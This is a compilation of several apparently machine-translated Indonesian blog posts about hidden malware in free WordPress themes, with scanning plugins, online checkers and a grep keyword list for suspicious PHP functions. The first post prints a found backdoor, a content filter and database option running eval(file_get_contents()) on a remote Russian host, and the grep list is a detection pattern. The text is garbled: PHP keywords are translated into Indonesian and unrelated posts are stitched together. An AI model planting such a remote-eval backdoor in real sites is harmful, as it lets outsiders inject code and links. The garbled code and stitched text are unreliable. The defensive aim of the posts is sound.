Halo teman teman. Apakah Anda yakin template WordPress gratis yang Anda gunakan untuk situs web dan blog Anda benar-benar aman dan tidak mengandung ancaman tersembunyi dan kode berbahaya? Apakah Anda benar-benar yakin akan hal ini? Sangat?)
Anda pikir mereka menjalankan template, menghapus tautan tersembunyi darinya, dan selesai. Anda secara berkala memindai file situs dengan antivirus, melihat alat webmaster Yandex di tab Keamanan dan, dengan lega, Anda melihat pesan di sana: “ Tidak ada kode berbahaya yang ditemukan di situs«.
Itu juga yang saya pikirkan. Aku tidak ingin membuatmu marah, tapi...
Kode Berbahaya Tersembunyi di Tema WordPress Gratis
Ini adalah surat yang saya terima minggu lalu melalui pos dari hosting saya. Baru-baru ini, mereka telah melakukan pemeriksaan rutin terhadap semua file situs untuk menemukan konten berbahaya, namun mereka menemukan konten ini dalam diri saya!
Semuanya dimulai dengan fakta bahwa suatu hari saya pergi ke situs saya dan tidak dapat meluncurkannya - sebuah prasasti kasar tentang file yang tidak ditemukan dengan ekstensi php keluar. Setelah sedikit tegang, saya pergi mempelajari isi folder dengan situs di hosting dan segera menemukan masalah - file template fuctions.php saya diganti namanya menjadi functions.php.malware, yang seolah-olah mengisyaratkan secara ambigu - antivirus atau sesuatu seperti itu berfungsi di sini) Setelah memasukkan surat, saya dan menemukan laporan di atas dari penghosting.
Hal pertama yang saya lakukan, tentu saja, adalah memeriksa berkas yang diberikan, mempelajari isinya, memindainya dengan berbagai antivirus, puluhan Pelayanan online untuk cek virus dll - pada akhirnya, saya tidak menemukan apa pun, semua orang dengan suara bulat mengklaim bahwa file tersebut sepenuhnya aman. Tentu saja, saya mengungkapkan keraguan saya kepada penghosting, mengatakan bahwa Anda mengacaukan sesuatu, tetapi untuk berjaga-jaga, saya meminta mereka untuk memberikan laporan tentang penemuan kode berbahaya.
Dan inilah yang mereka katakan kepada saya
Saya membuka informasi google tentang kode ini dan dengan serius memikirkannya ...
Cara menemukan potongan kode berbahaya di template
Ternyata, ini adalah trik yang sangat tidak sepele yang memungkinkan pihak yang berkepentingan untuk mentransfer data ke situs Anda dan mengubah konten halaman tanpa sepengetahuan Anda! Jika Anda menggunakan template gratis, maka Saya sangat merekomendasikan memeriksa function.php Anda untuk kode berikut:
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($konten)(
global $post;
jika(is_single() && ( [email dilindungi](get_option('blogoption'))) !== false)(
kembalikan $co;
) selain itu kembalikan $content;
}
Bahkan dengan pengetahuan saya yang sangat dangkal tentang php, terlihat bahwa filter tertentu sedang dibuat yang terkait dengan variabel global posting dan konten, yang bertanggung jawab untuk menampilkan konten hanya pada halaman posting blog (kondisi is_single). Sudah mencurigakan bukan? Nah, sekarang mari kita lihat apa yang akan ditampilkan kode yang diberikan di situs web kami.
Blogoption menarik yang diminta di database juga terlihat sangat mencurigakan. Kami pergi ke markas kami data MySQL dan kami menemukan di sana sebuah tabel bernama wp_options, jika Anda tidak mengubah awalannya, maka akan terlihat seperti ini secara default. Dan di dalamnya kami menemukan garis yang menarik bagi kami yang disebut blogoption
Betapa cantiknya! Kami melihat opsi berikut
return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));
Itu. kami dari situs tertentu (terlebih lagi, bahasa Rusia, ingatlah) mengembalikan konten yang dapat memuat apa saja! Sejumlah tautan, kode berbahaya, teks yang diubah, dll. Situs itu sendiri, saat mengaksesnya, memberikan kesalahan akses 403, yang tidak mengherankan. Tentu saja, saya juga menghapus opsi ini dari database.
Menurut informasi dari para korban, biasanya konten artikel Anda dikembalikan hanya dengan satu modifikasi - bukan titik "." tautan terbuka disamarkan dalam teks! Dan omong-omong, opsi ini ditulis ke database ketika template itu sendiri diinstal, dan kemudian kode yang melakukannya dengan aman akan hancur sendiri. Dan saya hidup dengan sampah seperti itu selama dua tahun, dan tidak ada satu pun antivirus atau layanan yang mengungkapkannya kepada saya ancaman ini selama itu. Sejujurnya, saya tidak memperhatikan apakah teknik ini pernah berhasil untuk saya, atau jika plugin keamanan saya memblokir kemungkinan ini (atau mungkin salah satu pembaruan WordPressa menutup lubang ini), tetapi tetap tidak menyenangkan.
Moral keju gratis
Bagaimana Anda menyukai kecanggihan template "penerjemah" kami (atau mereka yang mempostingnya di katalog mereka)? Anda tidak perlu memotong tautan dari footer) Sayang sekali saya tidak ingat dari mana saya mengunduh templat saya, itu sudah lama sekali, kalau tidak saya akan menulis beberapa yang penuh kasih sayang. Dan jika pada saat itu saya memiliki pengalaman yang sama dengan yang saya alami sekarang, maka saya pasti tidak akan menggunakan template gratis, atau, dalam kasus ekstrim, tidak akan mengunduh dari sumber yang tidak dikenal!
Lebih mudah untuk membeli beberapa template premium resmi seharga 15-20 dolar yang sama dan hidup dalam damai, mengetahui bahwa tidak ada lubang dan tautan terenkripsi di dalamnya, dan bahkan jika ada kerentanan, pengembang pasti akan merilis pembaruan di mana lubang ini akan ditutup. ( Omong-omong, Artem baru-baru ini menerbitkan sebuah artikel di mana dia hanya berbicara tentang template premium dan bahkan membagikan kode promosi untuk diskon brutal bagi mereka yang tertarik.)
WordPress adalah mesin paling populer untuk membuat berbagai situs informasi dan blog. Keamanan situs web Anda lebih dari keamanan data Anda. Ini jauh lebih penting, karena ini juga merupakan keamanan semua pengguna yang membaca sumber daya Anda dan mempercayainya. Itulah mengapa sangat penting agar situs tidak terinfeksi virus atau kode berbahaya lainnya.
Kami akan membahas cara melindungi WordPress dari peretasan di salah satu artikel berikut, tetapi sekarang saya ingin memberi tahu Anda cara memeriksa situs WordPress Anda dari virus dan kode berbahaya untuk memastikan semuanya aman.
Opsi pertama yang terlintas dalam pikiran adalah bahwa peretas telah meretas Anda dan membuat pintu belakang mereka ke dalam kode situs Anda agar dapat mengirim spam, memasang tautan, dan hal-hal buruk lainnya. Ini terkadang terjadi, tetapi sangat jarang jika Anda memperbarui perangkat lunak tepat waktu.
Ada ribuan tema dan plugin WordPress gratis di luar sana, dan di sinilah letak bahayanya. Itu satu hal ketika Anda mengunduh template dari situs WordPress dan hal lain ketika Anda menemukannya di situs kiri. Pengembang yang tidak bermoral dapat menyematkan berbagai kode berbahaya ke dalam produk mereka. Bahkan ada lebih banyak risiko jika Anda mengunduh template premium secara gratis, di mana peretas dapat menambahkan semacam lubang keamanan tanpa risiko apa pun, yang kemudian dapat mereka tembus dan melakukan apa yang mereka butuhkan. Itulah mengapa sangat penting untuk memeriksa situs wordpress Anda dari virus.
Memeriksa situs wordpress untuk virus
Hal pertama yang harus dilihat saat memeriksa situs bukanlah virus, melainkan plugin WordPress. Dengan cepat dan mudah, Anda dapat memindai situs Anda dan menemukan bagian kode mencurigakan yang patut diperhatikan, baik itu dalam tema, plugin, atau inti dari Wodpress itu sendiri. Mari kita lihat beberapa plugin paling populer:
1.TOC
Plugin yang sangat sederhana ini memeriksa semua tema yang dipasang di situs Anda untuk kode berbahaya. Plugin mendeteksi tautan tersembunyi yang dienkripsi dengan penyisipan kode base64, dan juga menampilkan Informasi rinci tentang masalah yang ditemukan. Paling sering, bagian kode yang ditemukan bukanlah virus, tetapi berpotensi berbahaya, jadi Anda harus memperhatikannya.
membuka "Penampilan" -> "TAC" kemudian tunggu sampai semua topik dicentang.
2. Pemindai VIP
Sangat mirip dengan pemindai topik TOC, tetapi dengan informasi yang lebih mendetail. Peluang yang sama untuk mendeteksi tautan, kode tersembunyi, dan sisipan berbahaya lainnya. Cukup buka item Pemindai VIP di bagian alat dan analisis hasilnya.
Mungkin cukup untuk menghapus file yang tidak perlu, misalnya desktop.ini. Atau Anda perlu melihat lebih dekat apa yang terjadi pada file menggunakan base64.
3. Anti-Malware dari GOTMLS.NET
Plugin ini memungkinkan Anda tidak hanya memindai tema dan inti situs dari virus, tetapi juga melindungi situs dari kekerasan kata sandi dan berbagai serangan XSS, SQLInj. Pencarian dilakukan berdasarkan tanda tangan dan kerentanan yang diketahui. Beberapa kerentanan dapat diperbaiki pada tempatnya. Untuk mulai memindai file, buka "Anti Malvare" di sidebar dan klik "Jalankan Pindai":
Sebelum Anda dapat menjalankan pemindaian, Anda perlu memperbarui basis data tanda tangan.
4. Pagar Kata
Ini adalah salah satu plugin keamanan dan pemindaian malware WordPress yang paling populer. Selain pemindai, yang dapat menemukan sebagian besar bookmark di kode WordPress, ada perlindungan waktu nyata berbagai macam serangan dan serangan brute-force. Selama pencarian, plugin menemukan kemungkinan masalah dengan berbagai plugin dan tema, memberi tahu Anda untuk memperbarui WordPress.
Buka tab "Pertahanan WP" di bar samping, lalu buka tab "Pindai" dan tekan "Mulai Pindai":
Pemindaian mungkin memakan waktu waktu tertentu, tetapi setelah selesai, Anda akan melihat laporan mendetail tentang masalah yang ditemukan.
5.AntiVirus
Ini adalah plugin sederhana lain yang akan memindai templat situs web Anda dari kode berbahaya. Kerugiannya adalah hanya template saat ini yang dipindai, tetapi informasinya ditampilkan dengan cukup detail. Anda akan melihat semua fitur berbahaya yang dimiliki tema tersebut dan kemudian Anda dapat menganalisis secara mendetail apakah itu menimbulkan bahaya. Temukan item "Anti Virus" dalam pengaturan dan kemudian klik "Pindai templat tema sekarang":
6. Pemeriksa Integritas
Juga disarankan untuk memeriksa integritasnya file WordPress, seandainya virus sudah mendaftar di suatu tempat. Untuk melakukan ini, Anda dapat menggunakan plugin Pemeriksa Integritas. Itu memeriksa semua file inti, plugin dan template untuk perubahan. Di akhir pemindaian, Anda akan melihat informasi tentang file yang dimodifikasi.
Pelayanan online
Ada juga beberapa layanan online yang memungkinkan Anda memeriksa situs wordpress Anda dari virus atau hanya memeriksa templatnya. Berikut beberapa di antaranya:
themecheck.org- Anda mengunduh arsip tema dan dapat melihat semua peringatan tentang kemungkinan fungsi berbahaya yang digunakan di dalamnya. Anda tidak hanya dapat melihat informasi tentang tema Anda, tetapi juga tentang tema lain yang diunggah oleh pengguna lain, juga tentang versi yang berbeda Topik. Apa pun yang ditemukan plugin dapat ditemukan di situs ini. Penyelidikan tema wordpress juga sangat penting.
virustotal.com- sumber daya terkenal tempat Anda dapat memeriksa situs atau file template Anda dari virus.
ReScan.pro- Memeriksa virus di situs WordPress menggunakan layanan ini gratis, analisis statis dan dinamis dilakukan untuk mendeteksi kemungkinan pengalihan Pemindai membuka halaman situs. Memeriksa situs terhadap berbagai daftar hitam.
sitecheck.sucuri.net- layanan sederhana untuk memindai situs dan tema dari virus. Ada plugin untuk WordPress. Mendeteksi tautan dan skrip berbahaya.
Pemeriksaan manual
Tidak ada yang lebih baik dari verifikasi manual. Linux memiliki utilitas grep yang luar biasa yang memungkinkan Anda mencari kemunculan string arbitrer dalam folder dengan file. Tetap memahami apa yang akan kita cari:
eval - fungsi ini memungkinkan Anda untuk mengeksekusi sewenang-wenang kode php, tidak digunakan oleh produk yang menghargai diri sendiri, jika salah satu plugin atau tema menggunakan fungsi ini, hampir 100% pasti ada virus di sana;
- base64_decode- fungsi enkripsi dapat digunakan dengan eval untuk menyembunyikan kode berbahaya, tetapi juga dapat digunakan untuk tujuan damai, jadi berhati-hatilah;
- sha1- metode lain untuk mengenkripsi kode berbahaya;
- gzinflate- fungsi kompresi, tujuan yang sama, bersama dengan eval, misalnya gzinflate(base64_decode(code);
- strrev- membalik string ke belakang bukan sebelumnya, karena varian dapat digunakan untuk enkripsi primitif;
- mencetak- mencetak informasi ke browser, bersama dengan gzinflate atau base64_decode berbahaya;
- file_put_contents- WordPress sendiri atau plugin masih dapat membuat file di sistem file, tetapi jika temanya melakukannya, Anda harus berhati-hati dan memeriksa mengapa perlu, karena virus dapat diinstal;
- file_get_contents- dalam banyak kasus digunakan untuk tujuan damai, tetapi dapat digunakan untuk mengunduh kode berbahaya atau membaca informasi dari file;
- keriting- cerita yang sama;
- fopen- membuka file untuk menulis, Anda tidak pernah tahu apa;
- sistem- fungsi menjalankan perintah di sistem Linux, jika dilakukan oleh tema, plugin atau wordpress itu sendiri, kemungkinan besar ada virus;
- symlink- membuat tautan simbolik dalam sistem, mungkin virus mencoba membuat yang utama berkas sistem tersedia dari luar;
- menyalin- menyalin file dari satu tempat ke tempat lain;
- getcwd- mengembalikan nama direktori kerja saat ini;
- cwd- mengubah direktori kerja saat ini;
- ini_get- menerima informasi tentang pengaturan PHP, seringkali untuk tujuan damai, tetapi Anda tidak pernah tahu;
- pelaporan_kesalahan(0)- menonaktifkan keluaran dari pesan kesalahan apa pun;
- window.top.location.href- fungsi javascript digunakan untuk pengalihan ke halaman lain;
- diretas- jadi, untuk berjaga-jaga, kami memeriksa, tiba-tiba, peretas itu sendiri memutuskan untuk memberi tahu kami.
Anda dapat mengganti setiap kata dalam perintah seperti ini:
grep -R "diretas" /var/www/path/to/files/wordpress/wp-content/
Atau gunakan skrip sederhana yang akan mencari semua kata sekaligus:
nilai="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
achr(urutan(
cwd
ini_get
window.top.location.href
menyalin(
eval(
sistem(
symlink(
pelaporan_kesalahan(0)
mencetak
file_get_contents(
file_put_contents(
fopen(
diretas"
cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --termasuk \*.php "$nilai" *
Halo sobat Idea Fox!
Saya tidak tahu tentang Anda, tetapi saya tidak bisa tidur nyenyak di malam hari. Masalah keamanan blog menyiksa saya. Tidak ada lagi kekuatan :-)
Saya membaca banyak blog tentang topik ini dan menguji banyak plugin yang membantu mengatasi masalah ini. Ya, dan di komentar mereka mulai mengajukan pertanyaan tentang topik perlindungan situs, yang mendorong saya untuk menulis catatan ini.
Bayangkan saja Anda sedang ngeblog, menulis artikel, mencoba ... Dan bajingan jahat datang dan menghancurkan situs Anda. Saya pikir akan ada banyak kekecewaan.
Lagipula, setiap blogger biasa menginvestasikan banyak waktu dan tenaga untuk mengembangkan situsnya. Dan bagi banyak orang, ngeblog umumnya menjadi obsesi ... Di sini dan seterusnya, jika TERSEBUT terjadi :-)
Nah, Anda mengerti betapa pentingnya hal ini.
Mari kita akhirnya turun ke bisnis :)
Beberapa bulan yang lalu saya sudah menulis catatan tentang sesuatu dari peretasan. Pastikan untuk membacanya. Tapi cukup banyak waktu telah berlalu sejak itu, dan saya telah mengambil tindakan tambahan untuk memperkuat pertahanan serba bisa.
Dalam catatan berikut, saya pasti akan membahas masalah ini secara mendetail. (Saya juga ingat dan menulis tentang menyiapkan ISP)
3. Kami memeriksa situs di layanan online lainnya
Layanan semacam itu tampaknya bercerai-tidak terlihat. Saya memiliki pendapat kuat bahwa banyak dari mereka benar-benar bodoh dan dibuat hanya untuk menampilkan iklan.
Web Dokter
DR.Web dibuat pelayanan yang baik untuk memeriksa situs web secara online. Secara pribadi, dia pernah membantu saya menemukan infeksi dari seorang teman di blog (Ada kode pihak ketiga di file .htaccess)
Ceknya sangat sederhana. Masukkan URL Anda dan tunggu hasil pemeriksaan.
antivirus-alarm.com
Perayap situs web yang kuat yang menggunakan sebanyak 43 database antivirus dari perusahaan antivirus terkemuka dunia.
Di sini juga, semuanya sangat sederhana. Kami mengemudi di URL situs kami dan dengan napas tertahan kami menunggu hasil pemindaian.
Inilah yang saya tunggu-tunggu.
Semuanya bersih, Anda bisa tidur nyenyak :-)
Semua ini tentu bagus, tetapi Anda juga perlu menginstal beberapa plugin yang sama sekali tidak mengganggu blog WordPress.
4. Minta tuan rumah untuk memeriksa situs Anda
Faktanya adalah bahwa hoster lebih peduli tentang masalah keamanan daripada Anda dan memiliki alat perlindungan yang kuat. Dan sarana perlindungan khusus.
Inilah berita saya untuk Anda hari ini. Selanjutnya, saya akan berbicara tentang plugin yang kuat, yang memungkinkan Anda melindungi blog WordPress Anda secara signifikan dari peretasan.
Saya telah bekerja dengannya selama 2 bulan dan saya sangat senang dengannya. Sejauh ini, saya sudah berurusan dengannya 3 kali dan melarang diri saya sendiri: -) Singkatnya, ada sesuatu untuk diceritakan.
Satu dari tonggak sejarah saat membuat blog - memilih template berkualitas tinggi. Ada banyak situs, baik berbayar maupun gratis. Namun, Anda harus berhati-hati di sini, karena kemungkinan besar Anda akan mendapatkan virus, skrip berbahaya, dan tautan tersembunyi bersama dengan file tersebut.
Tetapi meskipun templatnya bersih dalam hal keamanan, dan desain, kegunaan, dan fungsinya sangat cocok untuk Anda, ini tidak berarti semuanya beres. Tema harus memiliki kode HTML dan CSS yang valid, serta mematuhi semua standar CMS Wordpress. Bahkan tema berbayar dan template yang dibuat khusus memiliki masalah dengan yang terakhir.
Pengembang mesin terus mengembangkannya, dan pembuat template tidak selalu mengikutinya, menggunakan fungsi yang sudah tidak digunakan lagi saat membuatnya.
Hari ini saya akan menunjukkan kepada Anda 2 cara untuk memeriksa kepatuhan standar tema WordPress. Alat-alat ini digunakan ketika ditambahkan ke direktori resmi https://wordpress.org/themes/
Layanan untuk memeriksa tema WordPress dan template Joomla untuk kesesuaian dengan standar
ThemeCheck.org adalah layanan gratis, yang memungkinkan Anda memeriksa keamanan dan kualitas template untuk CMS WordPress dan Joomla sebelum menginstal di situs.
Untuk memeriksa tema, unggah arsipnya dari komputer Anda dengan mengeklik tombol “Pilih file” di situs web themecheck.org. Jika Anda tidak ingin hasil pemindaian disimpan di layanan dan tersedia untuk pengguna lain, centang “ Lupakan data yang diunggah setelah hasil“. Sekarang tekan tombol "Kirim".
Sebagai contoh, saya mengambil topik Antarmuka diunduh dari situs web resmi. 99 dari 100 - 0 kesalahan kritis dan 1 peringatan. Ini adalah hasil yang sangat bagus.
Sebagai perbandingan, template blog saya mendapat skor 0 (14 kesalahan dan 23 peringatan). Menurut saya bagi banyak orang, hasilnya tidak akan jauh berbeda, apalagi jika topiknya sudah ketinggalan zaman. Semua komentar dengan penjelasan, yang menunjukkan file dan baris tempat ditemukannya, terletak di halaman yang sama di bawah.
Terus terang, saya tidak mengerti banyak di sana, itu akan lebih berguna bagi penulis, dan lebih mudah bagi saya untuk mengubah template daripada memperbaiki semuanya. Aku hanya tidak tahu kapan aku akan melakukannya.
Beranda memiliki banyak pilihan tema web WordPress dan Joomla yang telah teruji sebelumnya dengan kemampuan untuk mengurutkan berdasarkan waktu yang ditambahkan atau dinilai. Ketika Anda mengkliknya, Anda dapat melihat informasi terperinci dan tautan ke situs web penulis dan halaman unduhan.
Jika Anda seorang pengembang dan tema Anda 100% valid, Anda dapat memberi tahu pengguna tentang hal itu dengan menyetel lencana peringkat khusus di atasnya.
Nilai dari layanan ThemeCheck.org adalah setiap webmaster dapat menggunakannya untuk memilih tema yang berkualitas bahkan sebelum dipasang di blog.
Plugin Pemeriksaan Tema
Anda dapat memeriksa kompatibilitas template yang sudah diinstal dengan standar WordPress terbaru menggunakan plugin Theme Check. Unduh tautan versi terbaru: https://wordpress.org/plugins/theme-check/
Fungsionalitas plugin mirip dengan layanan yang saya jelaskan di atas. Tidak perlu melakukan pengaturan apa pun setelah penginstalan dan aktivasi standar. Memeriksa pesanan:
- Buka panel admin di halaman menu “ Penampilan"-" Pemeriksaan Tema“.
- Pilih tema yang diinginkan dari daftar drop-down jika ada beberapa yang terpasang.
- Centang kotak “Suppress INFO” jika Anda tidak ingin mengirimkan informasi.
- Klik tombol "Periksa".
Hasilnya akan ditampilkan di halaman yang sama.
Seperti yang Anda lihat, tema default Dua puluh sepuluh juga tidak ideal, tetapi, misalnya, Dua Puluh Empat Belas tidak memiliki kesalahan.
Setelah memeriksa plugin, Anda dapat menonaktifkannya, dan lebih baik menghapusnya sampai waktu berikutnya.
Kesimpulan. Sebelum memasang template WordPress baru, periksa tidak hanya untuk tautan tersembunyi dan kode berbahaya dengan plugin TAC, tetapi juga dengan layanan ThemeCheck.org atau plugin Theme Check untuk kepatuhan dengan standar CMS terbaru.
P.S. Saat menjelajah Pembaca TopSape baru-baru ini, saya melihat blog SEO baru zenpr.ru, yang menempati posisi pertama di antara blogger dalam hal klik per bulan. Mengingat usianya baru sebulan lebih, hasilnya patut diapresiasi. Desain dengan gaya minimalis, jika tidak dikatakan tidak ada sama sekali, tetapi penulis menulis - Anda akan membacanya. Semua bisnis dan tanpa air. Sama seperti di judul blog - "nol karakter tambahan". Saya sarankan untuk membaca, Anda akan menemukan banyak informasi berguna.
Ada banyak template website gratis di Internet. Itu keju gratis itu terjadi hanya dalam perangkap tikus, semua orang tahu dan masih mengulurkan tangan untuk mengunduh yang gratis dan memasangnya di situs web Anda.
Sebelum menginstal template gratis, tidak ada salahnya untuk memeriksa tautan tersembunyi.
Dengan memasang template gratis, banyak yang bahkan tidak berasumsi bahwa mereka tidak dapat mempromosikan dan menghasilkan uang di situs semacam itu.
Dalam satu template seperti itu, bisa ada beberapa link sekaligus. Ini juga bagus jika tautan bersarang mengarah ke situs yang mirip dengan subjek Anda, dan bukan ke situs untuk orang dewasa. Dan hanya akan ada dua atau tiga, bukan lusinan.
Bagaimana menginstal template gratis semacam itu mengancam situs Anda? Situs tersebut akan jatuh di bawah filter, yang hampir tidak mungkin keluar darinya. Situs di bawah filter adalah situs mati!
Memasang template gratis di situs Anda seperti bermain rolet Rusia. Hanya kesempatan untuk mengatur secara mutlak templat bersih, sama dengan nol.
Paling-paling, Anda akan mendapatkan 3-5 tautan tersisa di situs Anda. Anda dapat, tentu saja, mencoba membersihkan template seperti itu, tetapi ada pengrajin yang memasukkan tautan ke dalam template sedemikian rupa sehingga tidak dapat dihapus dari sana (template rusak, hanya melengkung).
Sejujurnya, lebih mudah memesan template baru yang bersih dan unik (yang tidak bisa dikatakan tentang gratis), biayanya lebih murah.
Misalnya, saya menagih 200 rubel untuk membuat template (tulis ke Skype: oxamitta). Katakan padaku, apakah itu layak? Ambil gratis dan hilangkan situsnya, tetapi hemat 200 rubel? Wah hemat!!!
Tetapi bagaimana jika Anda sudah bertaruh pada template gratis? Bagaimana cara memeriksa templat untuk tautan tersembunyi?
Ada plugin khusus untuk ini. Menghapus tautan ini tidak akan membantu, tetapi untuk mengidentifikasinya - tolong.
Mungkin tidak semuanya begitu menakutkan dan template Anda hanya memiliki beberapa tautan eksternal! Apakah Anda ingin menguji template? Kemudian unduh plugin dari tautan di bawah (untuk melihat tautan untuk mengunduh plugin, klik salah satu tombol jejaring sosial).
Plugin dipasang di panel admin situs dengan cara standar. Tidak masuk akal untuk merekam tentang video ini, jadi hari ini kami akan mengaturnya dengan beberapa tangkapan layar.
Instal plugin dan aktifkan.
Untuk memperbesar tangkapan layar, klik dengan tombol kiri mouse. 
Buka tab Penampilan, TAS.
Memuat...